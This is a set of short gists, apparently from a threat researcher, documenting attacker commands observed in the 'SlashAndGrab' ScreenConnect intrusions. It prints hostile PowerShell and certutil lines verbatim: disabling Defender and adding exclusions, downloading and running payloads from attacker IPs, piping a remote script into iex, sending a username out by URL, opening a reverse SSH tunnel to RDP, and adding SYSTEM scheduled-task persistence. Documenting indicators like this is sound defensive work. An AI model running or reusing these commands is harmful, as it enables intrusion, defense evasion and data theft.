Dray Agha Purp1eW0lf
Purp1eW0lf
/ SlashAndGrab_lockbit.ps1
Created
February 23, 2024 16:18
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Ransomware binaries | |
| C:\\Windows\\TEMP\\ScreenConnect\\22.5.7881.8171\\LB3.exe\ | |
| #Defense evasion | |
| powershell -c foreach ($disk in Get-WmiObject Win32_Logicaldisk){Add-MpPreference -ExclusionPath $disk.deviceid} |
Purp1eW0lf
/ SlashAndGrab_certutil.ps1
Created
February 23, 2024 16:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| certutil -urlcache -f http[:]//23.26.137[.]225:8084/msappdata.msi c:\mpyutd.msi |
Purp1eW0lf
/ SlashAndGrab_name_enum.ps1
Created
February 23, 2024 16:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe Invoke-WebRequest -Uri http[:]//108.61.210.72/MyUserName_$env:UserName |
Purp1eW0lf
/ SlashAndGrab_name_senui.ps1
Created
February 23, 2024 16:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell wget -uri http://185[.]232[.]92[.]32:8888/SentinelUI.exe -OutFile C:\\Windows\\Help\\Help\\SentinelUI.exe; | |
| wget -uri http://185[.]232[.]92[.]32:8888/Logs.txt -OutFile C:\\Windows\\Help\\Help\\Logs.txt; | |
| wget -uri http://185[.]232[.]92[.]32:8888/SentinelAgentCore.dll -OutFile C:\\Windows\\Help\\Help\\SentinelAgentCore.dll; | |
| cmd /c C:\\Windows\\Help\\Help\\SentinelUI.exe; | |
| SCHTASKS /Create /TN \\Microsoft\\Windows\\Wininet\\UserCache_1708535250863 /TR \"C:\\Windows\\Help\\Help\\SentinelUI.exe\" /RU SYSTEM /SC ONSTART /RL HIGHEST /NP /F /DELAY 0000:05 |
Purp1eW0lf
/ SlashAndGrab_SSH.ps1
Created
February 23, 2024 16:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Script that initiated SSH | |
| $r = "C:\ssh\" | |
| $e = $r + "ssh.exe" | |
| $g = "aqua.oops.wtf" | |
| If (!(Test-Path $e)) { | |
| md $r > $null | |
| iwr -Uri ($g + "/z") -o ($r + "z.zip") | |
| Expand-Archive ($r + "z.zip") -d $r | |
| } | |
| $args = @("tunnel@" + $g,"-Z lollersk8","-R " + $p + ":localhost:3389","-p 443", "-N","-oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null") |
Purp1eW0lf
/ SlashAndGrab_chrome_remote.ps1
Created
February 23, 2024 16:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Download from Google | |
| powershell -c (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $env:ProgramData+'\\1.msi') | |
| # Install | |
| msiexec /i C:\\ProgramData\\1.msi |
Purp1eW0lf
/ SlashAndGrab_SSH_download.ps1
Created
February 23, 2024 16:23
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -c "$p = 9595; iwr -UseBasicParsing aqua[.]oops[.]wtf/d | iex |
Purp1eW0lf
/ SlashAndGrab_curl.ps1
Created
February 23, 2024 16:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl https[:]//cmctt.]com/pub/media/wysiwyg/sun.png | |
| curl https[:]//cmctt[.]com/pub/media/wysiwyg/invoke.png |
Purp1eW0lf
/ SlashAndGrab_servicetest2.ps1
Created
February 23, 2024 16:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -command "& Invoke-RestMethod -Uri \"http[:]//91.92.241.199:8080/servicetest2.dll\" -OutFile servicehost.dll |
Purp1eW0lf
/ SlashAndGrab_svchost.ps1
Created
February 23, 2024 16:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #adversary excluded directories and neutralised Defender | |
| powershell -ep bypass -c \"Set-MpPreference -DisableRealtimeMonitoring $true; | |
| Set-MpPreference -ExclusionPath C:\\Windows\\Temp; | |
| #then downloaded their file | |
| Invoke-WebRequest http://159[.]65[.]130[.]146:4444/svchost.exe -OutFile C:\\Windows\\Temp\\svchost.exe; | |
| C:\\Windows\\Temp\\svchost.exe |